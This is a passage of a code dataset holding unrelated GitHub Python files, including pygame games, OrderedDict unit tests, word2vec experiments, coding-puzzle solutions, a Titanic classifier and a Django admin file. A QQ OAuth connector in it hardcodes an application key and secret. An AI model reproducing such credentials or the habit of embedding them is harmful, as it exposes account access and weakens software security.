self.Ability_counter += 1\n else:\n self.Ability_counter = -1\n\n ###################### MOVE and counter set 0 ############\n self.playerMoveCounter = 0\n self.move()\n\n################ DRAW PLAYER ####################\n def player_draw(self):\n pygame.draw.rect(self.screen, self.color, (self.playerPos.x,\n self.playerPos.y, self.size, self.size))\n def ability_string(self):\n if self.Ability:\n self.abilitytext = \" FREEZE ACTIVATED\"\n elif not self.Ability and self.Ability_counter >=1:\n self.abilitytext = \"COOLDOWN: {0}\".format((1000 - self.Ability_counter)/100)\n \n else:\n self.abilitytext = \" Freeze Ready - press SPACE - Costs: 10% Highscore\"\n return 
self.abilitytext","repo_name":"chocolandTV/dodgeblock","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71432039172","text":"# Name: test_ordered_dict.py\n# Since: April 13th, 2020\n# Author: Christen Ford\n# Purpose: Performs unit testing on the simplejson.ordered_dict\n#\tmodule.\n\nfrom unittest import TestCase\n\nimport simplejson.ordered_dict as ordered_dict\n\n\nclass TestOrderedDict(TestCase):\n \"\"\"Implements unit tests on the simplejson.ordered_dict\n module. The tests performed by this module make sane\n attempts at being as thorough as possible, but they are\n not exhaustive.\n \"\"\"\n\n std_input = dict()\n std_input[\"abc\"] = 0\n std_input[\"def\"] = 1\n std_input[\"ghi\"] = 2\n\n @classmethod\n def get_test_dict(cls):\n return ordered_dict.OrderedDict(TestOrderedDict.std_input)\n\n def test_create(self):\n \"\"\"\n Description: Tests that the OrderedDict:__init__()\n function returns an OrderedDict created from a mapping\n containing the following key-value pairs:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input:\n (mapping): {\"abc\": 0, \"def\": 1, \"ghi\": 2}\n\n Output:\n (OrderedDict): An instance of an OrderedDict\n containing the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Test Case: Corresponds to test case TEST-0068.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n\n # TODO: Test that the od was constructed correctly\n\n def test_clear(self):\n \"\"\"\n Description: Test that the OrderedDict:clear()\n function correctly empties an OrderedDict containing the\n following mappings: {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input: This function accepts no input.\n\n Output: This function produces no output.\n\n Test Case: Corresponds to test case TEST-0069.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n self.assertNotEqual(len(od), 0)\n od.clear()\n self.assertEqual(len(od), 0)\n\n def test_set_item(self):\n \"\"\"\n Description: Tests that the OrderedDict:__setitem__()\n magic method correctly inserts a key-value pair into\n an empty ordered dictionary.\n\n Input:\n (str, int): (\"test-0070\", -1)\n\n Output: This function produces no output.\n\n Test Case: Corresponds to test case TEST-0070.\n \"\"\"\n od = ordered_dict.OrderedDict()\n self.assertNotIn(\"test-0070\", od.keys())\n self.assertNotIn(-1, od.values())\n od[\"test-0070\"] = -1\n self.assertIn(\"test-0070\", od.keys())\n self.assertIn(-1, od.values())\n\n def test_del_item(self):\n \"\"\"\n Description: Tests that the OrderedDict:__delitem__()\n magic method correctly removes a key-value pair from\n an OrderedDict containing the following mappings:\n {\"test-0070\": 0, \"test-0071\": 1, \"test-0072\": 2}.\n\n Input:\n (str): \"test-0070\"\n\n Output: This function produces no output.\n\n Test Case: Corresponds to test case TEST-0071.\n \"\"\"\n od = ordered_dict.OrderedDict()\n od[\"test-0070\"] = -1\n self.assertIn(\"test-0070\", od.keys())\n self.assertIn(-1, od.values())\n del od[\"test-0070\"]\n self.assertNotIn(\"test-0070\", od.keys())\n self.assertNotIn(-1, od.values())\n\n def test_iter(self):\n \"\"\"\n Description: Tests that the OrderedDict:__iter__()\n magic method returns a generator function that yields\n keys from an ordered dictionary containing\n the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input: This function accepts no input.\n\n Output:\n (generator): A generator function that yields\n keys 
pairs in the following order:\n 0, 1, 2.\n\n Test Case: Corresponds to test case TEST-0072.\n \"\"\"\n test_output = [\"abc\", \"def\", \"ghi\"]\n od = TestOrderedDict.get_test_dict()\n index = 0\n for key in od.__iter__():\n k = test_output[index]\n self.assertEqual(k, key)\n index += 1\n\n def test_reversed(self):\n \"\"\"\n Description: Tests that the OrderedDict:__reversed__()\n magic method returns a generator function that yields\n keys in reverse order from an ordered dictionary\n containing the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input: This function accepts no input.\n\n Output:\n (generator): A generator function that yields\n keys in the following order:\n 2, 1, 0.\n\n Test Case: Corresponds to test case TEST-0073.\n \"\"\"\n test_output = [\"ghi\", \"def\", \"abc\"]\n od = TestOrderedDict.get_test_dict()\n index = 0\n for key in od.__reversed__():\n k = test_output[index]\n self.assertEqual(k, key)\n index += 1\n\n\n def test_pop_item_rear(self):\n \"\"\"Description: Tests that the OrderedDict:popitem()\n function returns the last key-value pair in an OrderedDict\n consisting of the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input:\n (boolean): True\n\n Output:\n (str, int): (\"ghi\", 2)\n\n Test Case: Corresponds to test case TEST-0074.\n \"\"\"\n test_output = (\"ghi\", 2)\n od = TestOrderedDict.get_test_dict()\n self.assertEqual(od.popitem(True), test_output)\n\n def test_pop_item_front(self):\n \"\"\"\n Description: Tests that the OrderedDict:popitem()\n function returns the first key-value pair in an\n OrderedDict consisting of the following key-value\n mappings: {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input:\n (boolean): False\n\n Output:\n (str, int): (\"abc\", 0)\n\n Test Case: Corresponds to test case TEST-0075.\n \"\"\"\n test_output = (\"abc\", 0)\n od = TestOrderedDict.get_test_dict()\n self.assertEqual(od.popitem(False), test_output)\n\n def test_reduce(self):\n \"\"\"\n Description: Tests that the OrderedDict:__reduce__()\n function works correctly.\n\n Input: This function accepts no input.\n\n Output:\n (OrderedDict, list): A Tuple consisting of a class\n reference to an OrderedDict containing the following\n mappings: {\"abc\": 0, \"def\": 1, \"ghi\": 2}, as well\n as a list of all key-value entries in the ordered\n dictionary.\n\n Test Case: Corresponds to test case TEST-0076.\n \"\"\"\n test_output = (ordered_dict.OrderedDict, ([['abc', 0], ['def', 1], ['ghi', 2]],))\n od = TestOrderedDict.get_test_dict()\n self.assertEqual(od.__reduce__(), test_output)\n\n\n def test_keys(self):\n \"\"\"\n Description: Tests that the OrderedDict:keys() function\n returns athe correct list of keys from an ordered\n dictionary via a generator function.\n\n Input: This function accepts no input.\n\n Output:\n (generator): A generator that yields the following\n keys in this order: \"abc\", \"def\", \"ghi\".\n\n Test Case: Corresponds to test case TEST-0077.\n \"\"\"\n test_output = [\"abc\", \"def\", \"ghi\"]\n\n od = TestOrderedDict.get_test_dict()\n index = 0\n for key in od.keys():\n self.assertEqual(key, test_output[index])\n index += 1\n\n\n def test_repr(self):\n \"\"\"\n Description: Tests that __repr__() returns the\n correct string representation of an OrderedDict.\n\n Input: This function accepts no input.\n\n Output:\n (str): A string representation of an OrderedDict\n containing the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Test Case: Corresponds to test case TEST-0078.\n \"\"\"\n od = 
TestOrderedDict.get_test_dict()\n rep = str(od)\n # TODO: Testing needs performed here as well\n\n\n def test_copy(self):\n \"\"\"\n Description: Tests that the OrderedDict:copy() function\n returns a copy of an ordered dictionary.\n\n Input:\n (OrderedDict): An OrderedDict containing the\n following mappings: {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Output:\n (OrderedDict): An identical OrderedDict to the\n input OrderedDict containing the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Test Case: Corresponds to test case TEST-0079.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n self.assertEqual(od, od.copy())\n\n\n def test_fromkeys_correct(self):\n \"\"\"\n Description: Tests that the OrderedDict:fromkeys()\n function correctly constructs an ordered dictionary\n from a list of keys.\n\n Input:\n (list): [\"abc\", \"def\", \"ghi\"]\n\n Output:\n (OrderedDict): An OrderedDict containing the\n keys \"abc\", \"def\", \"ghi\".\n\n\n Test Case: Corresponds to test case TEST-0080.\n \"\"\"\n test_input = [\"abc\", \"def\", \"ghi\"]\n od = ordered_dict.OrderedDict.fromkeys(test_input)\n index = 0\n for key in od.keys():\n self.assertEqual(key, test_input[index])\n index += 1\n\n def test_fromkeys_empty_list(self):\n \"\"\"\n Description: Tests that the OrderedDict:fromkeys()\n function correctly constructs an ordered dictionary\n from an empty list of keys.\n\n Input:\n (list): An empty list.\n\n Output:\n (OrderedDict): An OrderedDict containing no\n key-value pairs.\n\n Test Case: Corresponds to test case TEST-0081.\n \"\"\"\n od = ordered_dict.OrderedDict.fromkeys([])\n self.assertEqual(len(od), 0)\n\n def test_equals_true(self):\n \"\"\"\n Description: Tests that the OrderedDict:__eq__() function\n correctly identifies an equal ordered dictionary.\n\n Input:\n (OrderedDict, OrderedDict): The first OrderedDict\n should have identical key-value pairs to the\n second OrderedDict.\n\n Output:\n (boolean): True\n\n Test Case: Corresponds to test case TEST-0082.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n other = TestOrderedDict.get_test_dict()\n self.assertEqual(od.__eq__(other), True)\n\n def test_equals_false(self):\n \"\"\"\n Description: Tests that the OrderedDict:__eq__() function\n correctly identifies a non-equal ordered dictionary.\n\n Input:\n (OrderedDict, OrderedDict): The first OrderedDict\n should have different key-value pairs from the\n second OrderedDict.\n\n Output:\n (boolean): False\n\n Test Case: Corresponds to test case TEST-0083.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n other = ordered_dict.OrderedDict()\n self.assertEqual(od.__eq__(other), False)\n\n def test_not_equals_false(self):\n \"\"\"\n Description: Tests that the OrderedDict:__ne__() function\n correctly identifies an equal ordered dictionary.\n\n Input:\n (OrderedDict, OrderedDict): The first OrderedDict\n should have identical key-value pairs to the\n second OrderedDict.\n\n Output:\n (boolean): False\n\n Test Case: Corresponds to test case TEST-0084.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n other = TestOrderedDict.get_test_dict()\n self.assertEqual(od.__ne__(other), False)\n\n def test_not_equals_true(self):\n \"\"\"\n Description: Tests that the OrderedDict:__ne__() function\n correctly identifies a non-equal ordered dictionary.\n\n Input:\n (OrderedDict, OrderedDict): The first OrderedDict\n should have different key-value pairs from the\n second OrderedDict.\n\n Output:\n (boolean): True\n\n Test Case: Corresponds to test case TEST-0085.\n \"\"\"\n od = 
TestOrderedDict.get_test_dict()\n other = ordered_dict.OrderedDict()\n self.assertEqual(od.__ne__(other), True)\n","repo_name":"gollum18/simplejson-test-suite","sub_path":"simplejson/simplejson/tests/test_ordered_dict.py","file_name":"test_ordered_dict.py","file_ext":"py","file_size_in_byte":12052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9262634061","text":"import pygame\n\nimport setup\nfrom data.add_map import AddMap\nfrom engine.buttons.buttons import Buttons\nfrom engine.game import Game\nfrom engine.screen.start_screen import StartScreen\nfrom setup import *\nfrom sound.sound import Sound\n\n# Подсказки глючат\n# Отключить кнопки при выигрыше\n\npygame.init()\npygame.display.set_caption(\"СКАН-МАТИК / Японские сканворды с математикой\")\nsize = [WIDTH, HEIGHT]\nscene = pygame.display.set_mode(size)\nclock = pygame.time.Clock()\nplayGame = True\ndeltatime = 0\n\nmaps = AddMap()\n\nbuttons = Buttons()\nsound = Sound(pygame)\ngame = Game(maps, sound)\n\nmouse_button_pressed_1 = 0\nmouse_button_pressed_3 = 0\n\nstart_screen = StartScreen()\nif setup.error < 8:\n sound.play(Sound.START_PLAY_GAME)\nelse:\n start_screen.enabled = False\n\nwhile playGame:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n playGame = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n playGame = False\n # Если нет класса с выведенным примером для решения\n # и закончилась экранная заставка\n if setup.view_example is None:\n if event.type == pygame.MOUSEBUTTONDOWN and not start_screen.enabled:\n if mouse_button_pressed_1 == 0 and event.button == 1:\n sound.play(Sound.CLICK)\n game.press_mouse_1(pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n game.set_filling(pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n\n if mouse_button_pressed_3 == 0 and event.button == 3:\n sound.play(Sound.CLICK)\n game.set_blocked(pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n\n mouse_button_pressed_1 = event.button\n mouse_button_pressed_3 = event.button\n\n elif event.type == pygame.MOUSEBUTTONUP:\n mouse_button_pressed_1 = 0\n mouse_button_pressed_3 = 0\n else:\n mouse_button_pressed_1 = 0\n mouse_button_pressed_3 = 0\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n setup.view_example.press_mouse_button_1(pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n\n scene.fill(\"#1c3055\")\n game.draw(scene, deltatime)\n\n if setup.view_example is not None:\n buttons.draw(scene, pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1], False)\n setup.view_example.draw(scene)\n elif not start_screen.enabled:\n pressed_btn = buttons.draw(scene, pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1], True)\n\n if pressed_btn == Buttons.AUTHORS:\n game.draw_authors(scene, deltatime)\n\n if pressed_btn == Buttons.PLAY:\n game.draw_play(scene, deltatime)\n\n if mouse_button_pressed_1 == 1 and pressed_btn != \"NONE\":\n mouse_button_pressed_1 = 0\n if pressed_btn == Buttons.CHECK:\n sound.play(Sound.CLICK)\n game.check_end_round()\n elif pressed_btn == Buttons.RESTART:\n sound.play(Sound.CLICK)\n game.start_level()\n elif pressed_btn == Buttons.HINT:\n sound.play(Sound.HELP)\n game.run_help()\n elif pressed_btn == Buttons.MATH_30:\n sound.play(Sound.COMPLEXITY)\n setup.difficulty = 1\n game.start_level()\n elif pressed_btn == Buttons.MATH_60:\n sound.play(Sound.COMPLEXITY)\n setup.difficulty = 2\n game.start_level()\n elif pressed_btn == Buttons.MATH_100:\n sound.play(Sound.COMPLEXITY)\n 
setup.difficulty = 0\n game.start_level()\n elif pressed_btn == Buttons.NEXT:\n sound.play(Sound.CLICK)\n setup.level += 1\n if setup.level == len(game.maps.level) or setup.level == setup.max_level + 1:\n setup.level -= 1\n game.start_level()\n elif pressed_btn == Buttons.PREV:\n sound.play(Sound.CLICK)\n setup.level -= 1\n if setup.level < 0:\n setup.level = 0\n else:\n game.start_level()\n elif pressed_btn == Buttons.EXIT:\n setup.save()\n playGame = False\n elif pressed_btn == Buttons.RESET_GAME:\n sound.play(Sound.CLICK)\n setup.reset()\n game.gamestate = Game.PLAY_GAME\n game.start_level()\n\n if start_screen.alpha > 0:\n start_screen.draw(scene, deltatime)\n\n pygame.display.flip()\n\n # Если не отображено окно с примером, то работаем с мышкой и основным полем\n if setup.view_example is None:\n if mouse_button_pressed_1 == 1:\n game.mouse_1_button_down(mouse_button_pressed_1, pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n if mouse_button_pressed_3 == 3:\n game.mouse_3_button_down(mouse_button_pressed_3, pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n\n game.act(deltatime, pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n\n deltatime = clock.tick(FPS) / 1000\n\npygame.quit()\nsetup.save()","repo_name":"Fox-Bella/nonogramms","sub_path":"nonogramms.py","file_name":"nonogramms.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27173329337","text":"from gensim.models import KeyedVectors\r\nimport time\r\nimport numpy as np\r\nmodel_dir = './entity_vector/entity_vector.model.bin'\r\nmodel = KeyedVectors.load_word2vec_format(model_dir, binary=True)\r\n# model_dir = './jawiki_word_vectors_300d/word_vectors.txt'\r\n# model = KeyedVectors.load_word2vec_format(model_dir, binary=False)\r\nprint(type(model))\r\n\r\n# print(len(model.get_vector('九州')))\r\nstart = time.time()\r\nprint('九州' in model)\r\nend = time.time()\r\nprint(end-start)\r\n# print(model(u'九州大学'))\r\n\r\n# results = model.most_similar(u'九州大学')\r\n# for result in results:\r\n# print(result)\r\n#\r\n# print('\\n')\r\n#\r\n\r\n\r\nmodel_dir = './entity_vector/entity_vector.model.bin'\r\nmodel = KeyedVectors.load_word2vec_format(model_dir, binary=True)\r\nsimilar_list = model.most_similar(positive=[u'[東京]',u'[日本]'],negative=[u'[アメリカ]'])\r\nfor similar_set in similar_list:\r\n print(similar_set)\r\n\r\nvector = model.get_vector(\"東京\")\r\nprint(vector)\r\nprint(type(vector))\r\nprint(vector.shape)\r\nsim_vector = np.zeros(200)\r\nsim_vector[1:200] = vector[1:200]\r\nsim_vector[0] = vector[0] * 0.9\r\nprint(sim_vector)\r\nprint(model.similar_by_vector(sim_vector)[0][0])\r\n\r\ndef cosine_similarity(X, Y):\r\n \"\"\"\r\n 行列X,Yの列ベクトルと行ベクトルのコサイン類似度をまとめて計算し,コサイン類似度を並べたリストを出力\r\n \"\"\"\r\n return (X @ Y.T) / np.sqrt(np.nansum(np.power(X, 2), axis=1) * np.nansum(np.power(Y, 2), axis=1)) # .Tは転置行列\r\n\r\ndef word_vectors(word, model):\r\n \"\"\"\r\n 引数のwordは単語,modelはword2vecのモデル(下の_main_参照)\r\n word2vecが引数のwordに対応していればその単語に対応する200次元wordベクトルを,なければ0が200個並ぶベクトルを返す\r\n \"\"\"\r\n if word in model:\r\n return model.get_vector(word)\r\n else:\r\n return np.zeros(200)\r\n\r\n# v = np.asarray([word_vectors(word, model) for word in model])\r\n# 
print(len(v))\r\n\r\n\r\n","repo_name":"Takashi-Ishikawa-0419/lyrics_classification","sub_path":"word2vec_practice2.py","file_name":"word2vec_practice2.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29168510403","text":"#coding=utf-8\n\nfrom connector import Connector\nimport urllib2, json, urlparse\n\nAPP_KEY = '100406677'\nAPP_SECRET = '0a1d05bcf76ed7f37d2467902c967120'\n\nclass QQConnector(Connector):\n\n name = 'qq'\n verbose_name = u'QQ'\n login_image = 'http://qzonestyle.gtimg.cn/qzone/vas/opensns/res/img/Connect_logo_7.png'\n\n def __init__(self):\n self.openid_url = 'https://graph.qq.com/oauth2.0/me'\n\n super(QQConnector, self).__init__(\n key=APP_KEY,\n secret=APP_SECRET,\n login_url='https://graph.qq.com/oauth2.0/authorize',\n get_token_url='https://graph.qq.com/oauth2.0/token',\n api_url='https://graph.qq.com/',\n )\n\n def _parse_token(self, response):\n token_dict = urlparse.parse_qs(response)\n access_token = token_dict['access_token'][0]\n expire = token_dict['expires_in'][0]\n\n url = '%s?access_token=%s' % (self.openid_url, access_token)\n response = urllib2.urlopen(url).read()[9:-3]\n uid = json.loads(response)['openid']\n\n response = self._qq_api(uid, access_token, 'user/get_user_info')\n return uid, response['nickname'], access_token, expire\n\n def _qq_api(self, uid, access_token, url, **kwargs):\n return self.api(access_token, url, oauth_consumer_key=APP_KEY, openid=uid, format='json', **kwargs)\n\n def settings(self, uid, access_token):\n\n return {\n }\n","repo_name":"zneo317/Projects","sub_path":"niubsteel/users/connectors/qq.py","file_name":"qq.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34997549330","text":"# Author:Piao Luo\n# 生成器 由于内存有限,对一些有规律的列表,进行一边循环一边计算,只有在调用的时候才会生成,且只记录当前位置,节约内存\n# 列表生成式\nlist = [i * 2 for i in range(10)]\nprint(list) # [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]\n\n\n# 斐波那契\ndef fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n += 1\n\n\nfib(5)\n\n\n# 生成器\ndef fib1(max1):\n n, a, b = 0, 0, 1\n while n < max1:\n yield b\n a, b = b, a + b\n n += 1\n\n\nf = fib1(100) # 生成器\nprint(f.__next__())\nprint(f.__next__())\nprint(f.__next__())\n","repo_name":"LuoPiaoZZ/pythonTest","sub_path":"lp93.py","file_name":"lp93.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33931034358","text":"#!/usr/bin/env python3\n\ndef preprocess(s:str) -> list:\n s = s.lower().replace(\".\", \"\").split()\n stop_words = [\"in\", \"is\", \"a\", \"of\", \"the\", \"but\", \"itself\", \"more\", \"like\", \"what\", \"does\"]\n s = [word for word in s if word not in stop_words]\n return s\n\ndef make_trie(s:list) -> dict:\n trie = {}\n for word in s:\n node = trie\n for char in word:\n node = node.setdefault(char, {})\n node[\"is_word\"] = False\n node[\"is_word\"] = True\n return trie\n\ndef write_trie_to_graphviz(trie, parent='root', graph=None, edge_label='', file=None):\n # Initialize the file if it does not exist\n if file is None:\n file = open('trie.dot', 'w')\n file.write('digraph Trie {\\n')\n file.write(' node [shape=circle]\\n') # Set the shape of nodes\n # No invisibility style is applied to the root here\n\n # Traverse the trie\n for char, next_node in trie.items():\n if char == \"is_word\":\n continue\n\n # Create a 
node identifier by appending the character to the parent identifier\n node_id = (parent if parent else '') + char\n\n # Define the background color for is_word nodes\n bg_color = 'yellow' if next_node.get(\"is_word\", False) else 'white'\n\n # Write the node to the file\n file.write(f' \"{node_id}\" [label=\"{char}\", style=filled, fillcolor={bg_color}];\\n')\n\n # Write an edge from the parent to the current node without applying invisibility style\n if parent:\n file.write(f' \"{parent}\" -> \"{node_id}\" [label=\"{edge_label}\"];\\n')\n\n # Recursively write the children of the current node to the file\n write_trie_to_graphviz(next_node, node_id, graph, edge_label='', file=file)\n\n # Only close the file when at the root call to avoid partial writes\n if parent == 'root':\n file.write('}\\n')\n file.close()\n\n # Use the Graphviz command-line tool to convert the .dot file to a PNG file\n import os\n os.system('dot -Tpng trie.dot -o trie.png')\n\ndef make_trie_to_tree(trie: dict) -> dict:\n tree = {}\n for char, next_node in trie.items():\n if char == \"is_word\":\n continue\n tree[char] = make_trie_to_tree(next_node)\n return tree\n\n\n\ndef main():\n s = \"Intelligent behavior in people is a product of the mind. But the mind itself is more like what the human brain does.\"\n s = preprocess(s)\n s = {'intelligent': {\n 'is_word': True\n },\n 'b': {\n 'is_word': False,\n 'ehaviour': {\n 'is_word': True\n },\n 'rain': {\n 'is_word': True\n }\n },\n 'p': {\n 'is_word': False,\n 'eople': {\n 'is_word': True\n },\n 'roduct': {\n 'is_word': True\n }\n },\n 'mind': {\n 'is_word': True\n },\n 'human': {\n 'is_word': True\n }\n }\n write_trie_to_graphviz(s)\n\nif __name__ == \"__main__\":\n main()","repo_name":"johansolbakken/tdt4117-assignment4","sub_path":"1/1c.py","file_name":"1c.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16938877239","text":"#!/bin/python3\n\nimport sys\nimport heapq\n\n\n \n\nn = int(input().strip())\na = []\na_i = 0\nsmaller = []\nlarger = []\n\nfor i in range(n):\n item = int(input().strip())\n if not larger or item >= larger[0]:\n heapq.heappush(larger, item)\n else:\n heapq.heappush(smaller, -item)\n \n size_diff = len(smaller) - len(larger)\n if size_diff == 2:\n transfer = -heapq.heappop(smaller)\n heapq.heappush(larger, transfer)\n if size_diff == -2:\n transfer = heapq.heappop(larger)\n heapq.heappush(smaller, -transfer)\n \n size_diff = len(smaller) - len(larger)\n if size_diff == 0:\n median = (larger[0] - smaller[0])/2\n elif size_diff == 1:\n median = -smaller[0]\n else:\n median = larger[0]\n print(\"%.1f\" % median)\n","repo_name":"HUIYINGLEE/HackerRank","sub_path":"Cracking the Coding Interview Challenges/Heaps: Find the Running Median.py","file_name":"Heaps: Find the Running Median.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1909252746","text":"class Solution(object):\n def maxA(self, N):\n \"\"\"\n :type N: int\n :rtype: int\n \"\"\"\n # @ xiyunyue2\n dp = [i for i in xrange(N + 1)]\n for i in xrange(7, N + 1):\n dp[i] = max(dp[i-4] * 3, dp[i-5] * 4)\n return dp[N]\n\n# 50 / 50 test cases passed.\n# Status: Accepted\n# Runtime: 32 ms\n","repo_name":"zqfan/leetcode","sub_path":"algorithms/651. 
4 Keys Keyboard/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"44"} +{"seq_id":"43968957571","text":"import pandas as pd\nimport numpy as np\nimport math\n\nfrom nimbusml import Pipeline, Role\nfrom nimbusml.preprocessing.missing_values import Handler\nfrom nimbusml.feature_extraction.categorical import OneHotVectorizer\nfrom nimbusml.preprocessing.schema import TypeConverter, ColumnConcatenator\nfrom nimbusml.ensemble import FastTreesBinaryClassifier\n\n# load the data files\ntrainData = pd.read_csv(\"train_data.csv\", sep=',') \ntestData = pd.read_csv(\"test_data.csv\", sep=',') \n\n# build a machine learning pipeline\npipeline = Pipeline([\n TypeConverter(columns = [\"Pclass\", \"Age\", \"SibSp\", \"Parch\", \"Fare\"], result_type = \"R4\"),\n Handler(replace_with = \"Mean\") << [\"Age\"],\n OneHotVectorizer() << [\"Sex\", \"Ticket\", \"Cabin\", \"Embarked\"],\n ColumnConcatenator() << {\"Feature\":[\"Pclass\", \"Age\", \"SibSp\", \"Parch\", \"Fare\", \"Sex\", \"Ticket\", \"Cabin\", \"Embarked\"]},\n FastTreesBinaryClassifier() << {Role.Label:\"Survived\", Role.Feature:\"Feature\"}\n])\n\n# train the model\npipeline.fit(trainData)\n\n# evaluate the model and report metrics\nmetrics, _ = pipeline.test(testData)\n\nprint(\"\\nEvaluation metrics:\")\nprint(\" Accuracy: \", metrics[\"Accuracy\"][0])\nprint(\" Auc: \", metrics[\"AUC\"][0])\nprint(\" Auprc: \", metrics[\"AUPRC\"][0])\nprint(\" F1Score: \", metrics[\"F1 Score\"][0])\nprint(\" LogLoss: \", metrics[\"Log-loss\"][0])\nprint(\" LogLossReduction: \", metrics[\"Log-loss reduction\"][0])\nprint(\" PositivePrecision: \", metrics[\"Positive precision\"][0])\nprint(\" PositiveRecall: \", metrics[\"Positive recall\"][0])\nprint(\" NegativePrecision: \", metrics[\"Negative precision\"][0])\nprint(\" NegativeRecall: \", metrics[\"Negative recall\"][0])\n\n# set up a sample\nsample = pd.DataFrame( [[1.0, \"male\", 48, 0.0, 0.0, \"B\", 70.0, \"123\", \"S\"]],\n columns = [\"Pclass\", \"Sex\", \"Age\", \"SibSp\", \"Parch\", \"Ticket\", \"Fare\", \"Cabin\", \"Embarked\"])\n\n# predict diagnosis for sample\nprediction = pipeline.predict(sample)\n\nprint(\"\\nSingle prediction:\")\nprint(\" Prediction: \", \"Survived\" if prediction[\"PredictedLabel\"][0] == 1.0 else \"Perished\")\nprint(\" Probability: \", prediction[\"Probability\"][0])\n","repo_name":"mdfarragher/DSC-PY","sub_path":"BinaryClassification/TitanicPrediction/Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3762608945","text":"from django.contrib import admin\r\nfrom . 
models import Departments, product,Doctors,Booking\r\n\r\n# Register your models here.\r\nclass productadmin(admin.ModelAdmin):\r\n list_display=('name','price','image')\r\n\r\nadmin.site.register(product,productadmin)\r\n\r\n\r\n\r\nadmin.site.register(Departments)\r\nadmin.site.register(Doctors)\r\n\r\nclass BookAdmin(admin.ModelAdmin):\r\n list_display=('id','p_name','p_phone','P_email','doc_name','booking_date','booked_on')\r\nadmin.site.register(Booking,BookAdmin)\r\n\r\nadmin.site.site_header=\"APOLLO HOSPITAL\"\r\n\r\nadmin.site.index_title=\"welcome admin\"","repo_name":"adnanmuhammed77/medical-management","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72865774532","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 24 09:21:07 2018\n\n@author: glazaoska1\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pycountry as pyc\nimport matplotlib\nfrom matplotlib import cm\nimport plotly.plotly as py\nimport plotly.offline as offline\nimport plotly.graph_objs as go\nfrom wordcloud import WordCloud\n\n#Initiate offline notebook for plotly\noffline.init_notebook_mode(connected=True)\n\n#Open data files\nreviews1 = \".\\data\\winemag-data_first150k.csv\"\n\n#Read data into the DataFrame\ndf = pd.read_csv(reviews1, index_col=0)\n\n#Create a scatter graph from the DataFrama\ndef scatter(df):\n \n fig = plt.figure()\n #Scatter the score against price. Low alpha for visualising points density\n plt.scatter(df['price'], df['points'], s=25, alpha=0.008, c='purple', marker='h')\n \n ax = plt.gca()\n \n #Log scale for price\n ax.set_xscale('log')\n \n #Styling\n fig.suptitle('Wine rating vs price', fontsize=12)\n ax.set_xlabel('Price [$]')\n ax.set_ylabel('Rating [out of 100]')\n \n #Save to PNG\n plt.savefig('.\\charts\\scatter.png', format='png', dpi=200)\n\n#Get country ISO-3 code from a name\ndef ccode(cname):\n \n #Check if the name exists in the pycountry list\n try:\n return pyc.countries.get(name=cname).alpha_3\n \n except KeyError:\n \n #Check if the short name works (e.g. 
